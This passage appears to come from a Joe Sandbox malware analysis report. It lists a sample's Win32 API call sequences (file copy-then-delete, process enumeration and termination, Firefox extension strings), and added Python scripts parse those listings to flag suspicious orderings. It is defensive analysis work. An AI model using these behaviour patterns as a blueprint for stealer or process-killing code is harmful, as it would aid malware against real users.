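        elif cur is None or "Part of subcall function" in s:
            continue
        elif OPCODE_RE.search(s):
            cur["opcode_id"] = OPCODE_RE.search(s).group(1)
        elif CALL_RE.search(s):
            api, _module, args, addr = CALL_RE.search(s).groups()
            cur["calls"].append({"api": api, "ref": int(addr, 16),
                                 "args": args.split(",") if args else []})
    return entries

def summarise(entry):
    seq = [c["api"] for c in entry["calls"]]
    notes = []
    for c in entry["calls"]:
        sam = hexarg(c["args"][3]) if c["api"].startswith("RegOpenKeyEx") and len(c["args"]) > 3 else None
        if sam is not None:
            notes.append("samDesired=" + decode_sam(sam))
        # Joe prints stack slots even for parameterless APIs (GetProcessHeap), so a root-key
        # handle staged for the later RegOpenKeyEx shows up there.
        notes += ["stack holds " + HKEY_ROOTS[v] for v in map(hexarg, c["args"]) if v in HKEY_ROOTS]
    return {"first_ref": entry["calls"][0]["ref"] if entry["calls"] else None, "sequence": seq,
            "notes": notes, "tags": [n for n, p in PATTERNS.items() if is_subsequence(p, seq)]}

def group_by_opcode(entries):
    """Opcode IDs seen at more than one address: one function, image copy plus mapped copy."""
    groups = {}
    for e in entries:
        if e["opcode_id"] and e["calls"]:
            groups.setdefault(e["opcode_id"], []).append(e["calls"][0]["ref"])
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}

if __name__ == "__main__":
    for s in map(summarise, parse_entries(SAMPLE)):
        print(f"{s['first_ref']:08X} {' -> '.join(s['sequence'])} {s['tags']} {s['notes']}")
```

Feeding it the whole function listing of the report rather than SAMPLE works the same way, since every entry starts at an "APIs" header and the Associated / Source File / hash lines never match the call regex. The 000000FF hKey in RegOpenKeyExA is a value Joe could not resolve, which is why the HKEY root is read off the captured stack slot instead.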
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D1A548
                                                                                    • lstrlen.KERNEL32(00000000,00000000), ref: 02D1A666
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1A923
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D1A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02D1A094
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D1A9AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                    • String ID:
                                                                                    • API String ID: 257331557-0
                                                                                    • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                                                    • Instruction ID: ad2c5ea3ad20f399b76d601978bea640066b5b1adc718264911a5d094dcf55d7
                                                                                    • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                                                    • Instruction Fuzzy Hash: F3E1DD76910128EBCB09EBA4DD90DEEB33AEF64704F508159E116B2290EE346E4CCF71
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                                                    • String ID:
                                                                                    • API String ID: 257331557-0
                                                                                    • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                                                    • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                                                    • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                                                    • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D1D6E8
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1D8FF
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1D913
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D1D992
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 211194620-0
                                                                                    • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                                                    • Instruction ID: 285a1fe4cd3e75a7d1e65ccb7741766cf6375bf8ead3e4fbfd8728fbc06a984e
                                                                                    • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                                                    • Instruction Fuzzy Hash: C291DC76910128EBCB08EBA4DD94DEE733AEF64708F504169E106A6290EF346E4CCF71
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 211194620-0
                                                                                    • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                                                    • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                                                    • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                                                    • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D1DA68
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1DC06
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1DC1A
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D1DC99
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 211194620-0
                                                                                    • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                                                    • Instruction ID: 014d8080af86839a601aece155da41f6cedaa91a2b69ea7371b1eea655a970bb
                                                                                    • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                                                    • Instruction Fuzzy Hash: AA81BC75910228EACB08EBA4DD94DEE733AEF64708F504569E106A6690EF346E4CCF71
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                    • API String ID: 998311485-3310892237
                                                                                    • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                                                    • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                                                    • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                                                    • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 02D29752
                                                                                      • Part of subcall function 02D28FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02D29785,00000000), ref: 02D28FC2
                                                                                      • Part of subcall function 02D28FB7: RtlAllocateHeap.NTDLL(00000000), ref: 02D28FC9
                                                                                      • Part of subcall function 02D28FB7: wsprintfW.USER32 ref: 02D28FDF
                                                                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 02D29812
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 02D29830
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D2983D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3729781310-0
                                                                                    • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                                                    • Instruction ID: 7350d8722f02b562392b8219a75493f4c86b2d71a2947d9514506ea9735667dd
                                                                                    • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                                                    • Instruction Fuzzy Hash: 20311575E00258EFDB14DFE0CC58BEDB7B9EB58704F204459E506AA284DB74AA88CF51
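The entries above list each function's Win32 calls in program order, but the report leaves the reader to spot the two orderings that matter: OpenProcess with access mask 00001001 followed by TerminateProcess (a process-kill primitive; 0x1001 decodes to PROCESS_TERMINATE | PROCESS_QUERY_LIMITED_INFORMATION) and CopyFileA followed by DeleteFileA (stage a copy of a file, work on it, remove the evidence). The following is an added example, not Joe Sandbox's code or the sample's: a small parser for the "APIs" lists as rendered here, an access-mask decoder, and a sequence check. The SAMPLE text is a constructed excerpt copied from two of the entries on this page; the regex assumes the bullet and "ref:" layout shown above and would need adjusting for other report layouts.

```python
"""Parse Joe Sandbox per-function 'APIs' lists and flag two call orderings.
Added example; assumes the bullet/'ref:' line format shown in this report."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: two of the report's own entries, trimmed to their API lists.
SAMPLE = """\
APIs
• memset.MSVCRT ref: 004194EB
  • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
  • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
  • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
• OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
• TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
• CloseHandle.KERNEL32(00000000), ref: 004195D6
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
• lstrlenA.KERNEL32(00000000), ref: 0040D698
• lstrlenA.KERNEL32(00000000), ref: 0040D6AC
• DeleteFileA.KERNEL32(00000000), ref: 0040D72B
"""

# One report line: optional "Part of subcall function XXXX:", then func.MODULE(args), ref: addr
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Process access rights from the Windows SDK (winnt.h); only the bits seen in the wild here.
PROCESS_RIGHTS = [
    (0x0001, "PROCESS_TERMINATE"),
    (0x0002, "PROCESS_CREATE_THREAD"),
    (0x0008, "PROCESS_VM_OPERATION"),
    (0x0010, "PROCESS_VM_READ"),
    (0x0020, "PROCESS_VM_WRITE"),
    (0x0040, "PROCESS_DUP_HANDLE"),
    (0x0080, "PROCESS_CREATE_PROCESS"),
    (0x0100, "PROCESS_SET_QUOTA"),
    (0x0200, "PROCESS_SET_INFORMATION"),
    (0x0400, "PROCESS_QUERY_INFORMATION"),
    (0x0800, "PROCESS_SUSPEND_RESUME"),
    (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"),
]


@dataclass
class Call:
    func: str
    module: str
    args: list             # argument tokens as printed; "?" means the sandbox could not recover it
    ref: str               # address of the call site
    parent: Optional[str]  # set when the call sits in a sub-function rather than the entry itself


def parse_entries(text):
    """Split at each 'APIs' heading and return one ordered list of Call per function."""
    entries = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not entries:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        entries[-1].append(Call(m.group("func"), m.group("module"), args,
                                m.group("ref").upper(), m.group("parent")))
    return entries


def hex_arg(call, index):
    """Argument `index` as an int when the report printed a literal 8-digit hex value, else None."""
    if index >= len(call.args):
        return None
    tok = call.args[index]
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def decode_process_access(mask):
    """Name the PROCESS_* bits in an OpenProcess desired-access mask; unknown bits stay as hex."""
    names = [name for bit, name in PROCESS_RIGHTS if mask & bit]
    rest = mask & ~sum(bit for bit, _ in PROCESS_RIGHTS)
    if rest:
        names.append(f"0x{rest:X}")
    return names


def find_behaviours(text):
    """Flag, per function, OpenProcess(...TERMINATE...) -> TerminateProcess and CopyFile -> DeleteFile."""
    hits = []
    for idx, calls in enumerate(parse_entries(text)):
        direct = [c for c in calls if c.parent is None]  # the function's own calls, in order
        names = [c.func for c in direct]
        for i, c in enumerate(direct):
            if c.func == "OpenProcess" and "TerminateProcess" in names[i + 1:]:
                mask = hex_arg(c, 0)
                rights = decode_process_access(mask) if mask is not None else []
                if mask is None or "PROCESS_TERMINATE" in rights:  # unknown mask: still worth a look
                    hits.append({"entry": idx, "behaviour": "process-kill", "ref": c.ref, "rights": rights})
            if c.func.startswith("CopyFile") and any(n.startswith("DeleteFile") for n in names[i + 1:]):
                hits.append({"entry": idx, "behaviour": "copy-then-delete", "ref": c.ref, "rights": []})
    return hits


if __name__ == "__main__":
    for hit in find_behaviours(SAMPLE):
        print(hit)
```

Only the entry's direct calls are sequenced; sub-function calls (the "Part of subcall function" lines) are kept for context but not ordered against them, since the report lists them once per callee rather than per call site. To run this over a whole report, paste the function entries into a file and pass its contents to find_behaviours in place of SAMPLE.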
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 004194EB
                                                                                      • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                                                      • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                                                      • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 396451647-0
                                                                                    • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                                                    • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                                                    • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                                                    • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 02D28931
                                                                                    • Process32First.KERNEL32(?,00000128), ref: 02D28945
                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 02D2895A
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • CloseHandle.KERNEL32(?), ref: 02D289C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1066202413-0
                                                                                    • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                                                    • Instruction ID: 88a944fdca230136a5e669f02c12b6c7a7cf6fd5b6935a62f3b62b278af5935d
                                                                                    • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                                                    • Instruction Fuzzy Hash: 16316071941228EBCB24DF94DD44FEEB779EF55708F104199E10AA22A0DB346F88CFA1
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                                                    • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • CloseHandle.KERNEL32(?), ref: 00418761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
